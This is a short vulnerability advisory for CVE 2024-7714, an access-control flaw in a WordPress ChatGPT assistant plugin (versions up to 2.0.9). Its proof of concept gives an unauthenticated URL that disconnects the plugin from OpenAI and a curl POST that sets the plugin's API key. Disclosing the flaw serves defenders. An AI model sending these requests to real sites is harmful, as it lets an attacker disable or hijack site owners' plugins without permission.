AI Assistant with ChatGPT by AYS <= 2.0.9 – Unauthenticated AJAX Calls | CVE 2024-7714

Description

The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: 'ays_chatgpt_disconnect', 'ays_chatgpt_connect', and 'ays_chatgpt_save_feedback'

Proof of Concept

1. Install the plugin and configure OpenAI connectivity at '/wp-admin/admin.php?page=ays-chatgpt-assistant&ays_tab=tab3'

To disconnect OpenAI, open the below URL as unauthenticated:

https://example.com/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect

Or to configure the OpenAI settings from an unauthenticated context: 

curl -X POST --data 'ays_chatgpt_assistant_api_key=XXX&ays_chatgpt_assistant_id=1&rMethod=GET&request_type=models&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_connect' 'https://example.com/wp-admin/admin-ajax.php'